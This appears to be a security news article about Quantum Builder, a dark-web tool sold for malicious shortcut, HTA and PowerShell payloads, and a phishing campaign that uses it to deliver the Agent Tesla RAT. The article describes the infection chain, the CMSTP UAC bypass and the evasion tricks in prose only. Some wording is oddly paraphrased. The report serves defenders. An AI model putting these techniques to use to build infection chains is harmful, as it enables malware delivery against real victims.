The use of Dark Web Quantum Builder to run Agent Tesla RAT Malware

In a recent harmful attack, the Agent Tesla RAT is being distributed by the malware creator Quantum Builder, according to Zscaler ThreatLabz. Tesla is an active .NET-based keylogging and RAT application that has been running since 2014.

This campaign is far more advanced than the previous emphasis and uses LNK (Windows shortcut) files more.

Quantum Builder

Quantum Link Builder is another name for Quantum Builder, a program that cybercriminals can use to produce malicious shortcut files. This campaign has been connected to the Lazarus Group APT due to the shared TTPs and source code overlaps. However, security analysts could not confidently attribute this to a particular threat actor.

The threat actors behind this campaign create malicious payloads such as LNK, HTA, and PowerShell using Quantum Builder.

After putting together all these payloads, threat actors can utilise them to spread the Agent Tesla virus. The builder uses a range of complex strategies, including intricate anti-analysis tricks, complex, mysterious movements, and complicated anti-virtualisation techniques.

It is possible to get around User Account Control using the Microsoft Connection Manager Profile Installer (CMSTP) program.

Check to see if Windows Defender Exclusions are set up. Using LOLBins, a multi-stage infection chain that combines several different attack vectors, has been developed and is being used. PowerShell scripts are run in memory to prevent any detection.

For €189 a month of subscription, €355 for two months, €899 for six months, or as a one-time lifetime purchase for €1,500, Quantum Builder is available on the dark web.

Quantum Builder is a customisable tool that cybercriminals can use to create malicious shortcut files. In addition, it can produce malicious payloads like HTA, ISO, and PowerShell.

These payloads are utilised to transmit Agent Tesla, the next generation of malware, to the attacked PCs.

Infection Chain

When phishing emails are sent out, and one of the attachments is a GZIP archive file, the infection chain, a multi-stage assault chain with several stages, is begun. This attachment contains a shortcut to run PowerShell code that launches a remote HTA using the MSHTA.

A Chinese distributor of lump and rock sugar (Guangdong Nanz Technology co. ltd) is allegedly sending phishing emails disguised as order confirmation messages. Here, the mail includes a malicious LNK file that poses as a legitimate PDF document.

The HTA file, in turn, decrypts and runs a PowerShell loader script. Now, this script serves as both a downloader and an executor to run the Agent Tesla virus with administrative rights.

The utilisation of the Quantum Builder has been seen to increase in recent months. Because threat actors are utilising it to spread a range of infections. In a second variation of the infection process, a ZIP file is used in place of the GZIP archive.

The Quantum Builder has been used in a recent campaign against several businesses to build malware payloads for cyberattacks, the most recent of which is this Agent Tesla effort.